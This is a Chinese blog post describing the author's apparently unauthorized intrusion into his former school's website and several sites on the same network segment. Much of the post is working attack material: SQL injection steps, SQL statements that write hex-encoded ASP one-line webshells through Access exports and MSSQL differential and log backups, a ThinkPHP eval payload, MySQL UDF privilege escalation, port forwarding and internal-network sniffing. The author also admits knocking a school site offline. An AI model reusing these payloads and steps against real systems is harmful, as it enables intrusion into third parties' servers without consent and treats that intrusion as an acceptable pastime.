渗透测试

渗透测试之母校官网-part 1

字号+ 作者:Binghe 来源:转载 2016-11-25 10:00 我要评论( )

过程不算曲折,但还算漫长,知识点比较零碎,适合新手学习。 那么,那时我还小,我们一起来回忆,那些年 我们年少时 蛋疼的折腾。 离开母校那年,挚友摆了饭局送我......

过程不算曲折,但还算漫长,知识点比较零碎,适合新手学习。
那么,那时我还小,我们一起来回忆,那些年 我们年少时 蛋疼的折腾。

离开母校那年,挚友摆了饭局送我,席间我和楷文(淡定哥)有个约定。。。

时不我待,转眼一载,人事变迁,容颜沧桑,楷文兄,没我的日子你别来无恙。母校官网我还没搞定,你是否已经炸了她的墙角?

由于种种原因,一直没有足够的时间。。。渗透过程七零八落

来看下情况:
母校主站:www.*****x.cn


*信息收集

初步刺探结果:








某些数据库的调用做了防注入处理:




[AppleScript] 纯文本查看 复制代码
?
web服务:iis6.0  ASP 支持aspx
  
数据库:access
  
网站后台:http://www.******cn/admin/login.asp

手工找到数字型注入点:http://www.s*******.cn/news_detail.asp?id=954

明显的入库查询 sqlinjection

Sqlmap跑起来




结果不太理想,爆破不出表和字段,看来管理员为了防止猜表做了表前缀

对于access的注入,猜不到表,渗透戛然而止

 



后来又在复习的时候看到了sql注入access导出txt等文件方法,不能导出asp  但是我们可以配合IIS6.0解析漏洞导出binghe.asp;binghe.txt之类的文件

那么问题来了  , 路径哪里找?? 又不是phpmyadmin之类的可以报错文件,asp报错路径很少,但是我突然想到了conn.asp和5c%暴库

5c%是没有成功,conn.asp还是可以的,直接访问数据库连接文件,数据库连接文件和数据调用的相对路径冲突导致报错,没错爆出了绝对路径:


那么来sqlmap的–sql-shell用传说中的sql执行access导出txt、xls试试 配合iis6.0解析漏洞(PS:access已经过时,没研究过,小菜也不清楚access的sqlshell是不是可以执行,以前在后台遇到过可以执 行sql的功能,譬如帝国的某些版本)

逐一执行以下语句就可以导出一句话了

[AppleScript] 纯文本查看 复制代码
?
1
2
3
4
create table cmd (a varchar(50))
insert into cmd (a) values ('一句话木马')
select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;'from cmd
drop table cmd


更简单的

[AppleScript] 纯文本查看 复制代码
?
Select 'asp一句话木马' into [vote] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 8.0;' fromvote


Sqlshell执行无果 看来是我想多了  也许access注入点根本就不能取得真正的sqlshell



转而看其网站后台,用burpsuite爆破没跑出来,, 失败





小站,也看不出是什么cms,扫了目录,没有大的发现,有上传,但是需要登录,无法有效利用,有留言板,尝试XSS,无果,存在iis短文件名泄露漏洞,利用无果

入侵脚步又戛然而止




上次刺探主站没有什么收获  C段之,

瞄到一个站 本市的**中学  久闻大名!

注入一个,,sqlmap之  

[AppleScript] 纯文本查看 复制代码
?
--current-user   --sql-shell--os-shell


sa!!!!



[AppleScript] 纯文本查看 复制代码
?
select count(*) from master.dbo.sysobjects where xtype='x' andname='xp_cmdshell'


返回”1″,说明存在存储过程xp_cmdshell



试着执行cmd 不行啊老是超时  怪事




os-shell尝试获得交互式cmd  SQLmap自动提权修复xp_cmdshell也是超时  不明白哪里出了问题

手动在注入点执行也不行。。
咋办呢?想想还是找目录写个shell
用啊D列个目录  列了一会通过对比就找到了根目录
D:\wwwroot\dxzx\



跑了数据 解了md5  进了后台  想差异备份  但是手抖弄了个插配置文件一句话  但是忘了闭合asp标记



后来网站挂了  差点吓哭  我真的不是故意的 。  无法复现  等恢复了再说吧




个人对此表示万分歉意,对不起,已经致道歉信与修复方案至管理员邮箱

后来想到自己是多么的愚蠢,为什么不log备份,增量备份导出shell呢???
让我喝一杯82年的乐事冷静一下
其实log备份导出Public权限都能导出,更何况我们是sa,如果遇到奇葩的磁盘权限,可以尝试图片上传目录


#导出方法有以下几种方法:

   

MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少!

差异备份的流程大概这样:

[AppleScript] 纯文本查看 复制代码
?
01
02
03
04
05
06
07
08
09
10
11
12
1.完整备份一次(保存位置当然可以改)
 
backup database 库名 to disk = 'c:\ddd.bak';--
 
2.创建表并插曲入数据
 
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);--
 
3.进行差异备份
 
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--


上面

[AppleScript] 纯文本查看 复制代码
?
0x3C25657865637574652872657175657374282261222929253E


就是一句话木马的内容:

[AppleScript] 纯文本查看 复制代码
?
<%execute(request("a"))%>


如下是整理的常见的差异备份代码,思路一样!

===================================================

利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:


[AppleScript] 纯文本查看 复制代码
?
1
2
3
4
declare @a sysname,@s nvarchar(4000) select@a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a todisk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd)values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select@a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT


0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

声明:方法不是我想的,我只是写工具,默认得到shell是

[AppleScript] 纯文本查看 复制代码
?
<%execute(request("a"))%>


===============================================================

我发现上面代码,有时会无效,而直接用


[AppleScript] 纯文本查看 复制代码
?
1
backup database 库名 to disk ='c:\ddd.bak' create table [dbo].[dtest] ([cmd] [image]); insert into dtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E) backup database 库名 to disk='目标位置\d.asp'WITH DIFFERENTIAL,FORMAT;--


却可以成功,所以把最原始的方法写出来!思路是前人所创,这不说大家也知道的!库名 必须要有效的库名,一般注入工具都可以得到!如果某站过滤 “‘”,就要把字符内容转为数值了!
网上还有log增量备份的,我也把他记录一下


=====================================================
另一种log增量备份技术:
例:在注入点用;联合执行


[AppleScript] 纯文本查看 复制代码
?
1
2
3
4
5
6
';alter database null set RECOVERY FULL--
';create table cmd (a image)--
';backup log null to disk = 'f:\cmd' with init--
';insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292
9253EDA)--
';backup log null to disk = '备份路径'--


PS:0x3C25657865637574652872657175657374282261222929253EDA 是一句话小马16进制转来的
是为了防止单引号和asp标志的闭合问题,下面是几种可以尝试的写法:


[AppleScript] 纯文本查看 复制代码
?
1
2
3
4
5
a).<%%25Execute(request("a"))%%25>
b).<%Execute(request("a"))%>
c).%><%execute request("a")%><%
d).<script language=VBScript runat=server>executerequest("a")</script>
e).<%25Execute(request("a"))%25>


权限够大还可以直接调用systemobject的函数直接写:限于篇幅,大家可以自行整理

还是没拿下  但是我的脚步不会停止

C段一圈,很快拿下个脆弱的网站,账户名和密码都是网站简称、简单的提权了
权限还可以



内网 lcx转发过来



不过,c段的内网,意义不大,丢弃。

转了一会,又一个c段的,直接注入写shell,也是直接溢出提权



又是内网。。运气不是很好啊。

卡的让人想死  估计是个喳喳服务器,不看他了。。。




拿的c段都是内网,不能arp劫持目标,嗅探不到。。。。


思路转一下,来看旁注!拿目标的内网


拿下一个与主站同外网ip的站点 有希望撕入内网。。。
套路是注入进后台 截断拿shell



来提权服务器  又是恶心的内网 老套路转发上去

转发好 登录 看到这样子



不管他,mstsc/admin,挤下去,,




看了下,主站不在服务器上,运气好背啊,小小内网渗透一下




密码是随机设定的,其实那个不是密码,说明存在ipc$空连接的漏洞,好古老啊,手工利用一下看看,失败了,我都没心情一个一个测试了



读取一下管理密码,扫一下?



没读出来管理员的。。为什么运气这么差  导出hash去破解我也懒得搞了


嗅探开始,不久就有结果了哈哈




但是都是一些无用的信息,现在这里嗅探着,过个十天半个月的再来看看

内网存活:




那么问题来了,我们可不可以在内网里面netfake?
目标站的内网ip我们是通过在网站主页点一个校内应用得知的

事实证明不行,,,先放在那里嗅探吧  。。。。。



其实还有ip冲突劫持,不过劫持就没意思啦  我还是要拿到权限

再来看看另外一个旁站
下次看吧     背着书包上学堂。。。。。。。。。。。。



额 放假了
再来看看徐州市********育中心

运气比较好,Thinkphp框架,命令执行直接拿下
具体方法:


[AppleScript] 纯文本查看 复制代码
?
1
2
3
index.php/module/aciton/param1/${@phpinfo()}
 
index.php/module/action/param1/{${eval($_POST[/size][s][size=4])}}
来了来了 提权
翻到了root  直接来udf  但是用t00lsshell提权  显示创建lib/plugin目录失败



直接在菜刀里面右键创建目录    成功






上用户



其实这里的udf 为了防止各种错误  我写过一个小工具 传上去运行,将 自动udf mof 和 lpk 三种方式提权,详情见


[AppleScript] 纯文本查看 复制代码
?
https://github.com/v5est0r/mysql-promoting-privileges

lcx 连接上去看看






翻下目录  没有目标站信息等



码字很累,完结篇很快会写出来,更精彩哦
未完待续。。。

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Security/269.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 菜刀不能成功连接已上传木马

    菜刀不能成功连接已上传木马

    2017-12-14 10:51

  • 测试一次LOL领皮肤钓鱼网站的过程

    测试一次LOL领皮肤钓鱼网站的过程

    2017-05-05 14:24

  • 部署恶意CDN表单劫持渗透XX网络安全论坛

    部署恶意CDN表单劫持渗透XX网络安全论坛

    2016-12-15 09:54

  • 渗透测试之母校官网 part 2

    渗透测试之母校官网 part 2

    2016-11-25 10:06

网友点评
暂时未开启评论功能~